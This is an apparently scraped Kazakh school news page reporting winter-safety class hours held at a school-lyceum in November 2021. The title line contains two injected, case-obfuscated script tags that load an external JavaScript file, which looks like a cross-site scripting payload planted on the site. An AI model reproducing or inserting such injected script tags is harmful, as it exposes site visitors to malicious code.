2021 жылғы 10 қараша күні "Насыр Смағұлов атындағы мектеп-лицей" КММ-нің күзгі-қысқы кезеңде оқушылардың қауіпсіздігі бойынша іс-шараларды өткізу туралы Ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

11.11.2021

Суық мезгілдің басталуына және су объектілерінде мұздың пайда болуына байланысты, оқушыларда жазатайым оқиғалардың алдын алу, қысқы мезгілде жеке басының қауіпсіздігі мен айналасындағылардың қауіпсіздігіне саналы және жауапты қарауды қалыптастыру, олардың қолайсыз, өмірге қауіп төндіретін жағдайларда өмірі мен денсаулығын сақтау дағдыларын игеру, өзіне және зардап шеккендерге алғашқы көмек көрсету мақсатында 2021 жылғы 9 және 10 қараша күні  0-11 сынып жетекшілері "қысқы кезеңдегі қауіпсіздік"тақырыбы бойынша сынып сағаттарын ұйымдастырды. Күзгі-қысқы кезеңде су объектілеріндегі мінез-құлық қағидаларын зерделеу, мұз астына түскен жағдайда іс-қимылдарды ұйымдастыру, қысқы спорт және ойын түрлерімен (оның ішінде су айдындарының қатып қалған бетінде, тік беткейлерде және т.б.) айналысу кезінде қауіпсіздік шараларын қабылдау туралы, ғимараттардың шығып тұрған бөліктерінен қар мен мұз құлаған жағдайда қауіпсіздікті қамтамасыз ету туралы профилактикалық әңгімелесулер жүргізілді. Сынып сағатының қорытындысы бойынша оқушылардың қолы қойылған хаттамалар толтырылды. Сондай-ақ мектеп фойесінде ақпараттық стенд рәсімделді

Просмотров: 798

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу